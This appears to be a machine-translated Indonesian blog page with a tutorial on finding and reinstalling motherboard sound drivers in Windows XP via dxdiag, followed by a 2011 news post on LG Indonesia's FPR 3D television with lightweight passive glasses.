it very annoying, obviously his sound card is installed, it also continues to install the driver directly from the motherboard CD?! if there ever encountered a problem like this, it was hard ... yg ga solution we need to do only need a few simple steps ...

step-by-step her about this:

A. search for information about our motherboard
  1. entry start, hold Run dxdiag
  2. reply in DxDiag 5.03.2600.218 qt can directly see the motherboard brand and model we fuck on the System Manufacturer System Model with
  3. DxDiag coincidence if it is long so there is no information on the System Manufacturer and System Model, then what can make, can find information about motherboards we use the software for hardware detection, googling just to find the download trial software like that.
  4. after knowing the manufacturer and model of our motherboards, googling again (hehe), looking for aja yg provide free driver download for the motherboard we are ... a lot of examples of websites that provide free drivers http://www.driverguide.com (but need registration). or, go to the official website wrote our motherboard vendors, looking for drivers there ...
  5. download the appropriate driver with our Operating System (Windows XP, Windows ME, etc.)
  6. install the driver on your computer
  7. voila! we can listen to the song again from the computer!
good luck!

Monday, April 11, 2011

LG launches new TV 3-D technology

Posted by darmawan 4:49 PM, under ,, | No comments

LG Electronics Indonesia launches 3D TV technology with FPR (film pattern retarder), the latest technology which enables users to enjoy three-dimensional impressions.

Woen Dae Kim, the president director of PT LG Electronics Indonesia, said the technology needed to make glasses to watch 3D TV is no longer heavy and expensive.

"The technology is predicted to be a new generation of 3D television, and was developed by our research division. New LG who have it," he said in the latest innovative product launch in 2011, today.

He explained the benefits of the glasses looked from its shape that no longer requires a battery and microchips, pretty glasses with polarized lenses are commonly used today to enjoy 3D films at the cinema.

Glasses will be more affordable price. Television audience of this model is no longer need to feel the various limitations when watching a three-dimensional impression, such must be viewed in a dark room, see the upright position, and rarely available three-dimensional content.

"Television has 3D glasses for heavy and expensive, with this technology becomes cheaper price of eyeglasses so that more people can get it," said Erwin Liem, Product Marketing Flat Panel Display PT LG Electronics Indonesia.

Weights and dimensions are also more lightweight glasses and thin, just like ordinary glasses. In addition to the special coating, LG 3D Cinema has 10 times the level of depth and out 10 times, that does not exist in any other three-dimensional television.

LG Indonesia will issue a television with a size of 42 inches, the size of the most widely used to living rooms at affordable prices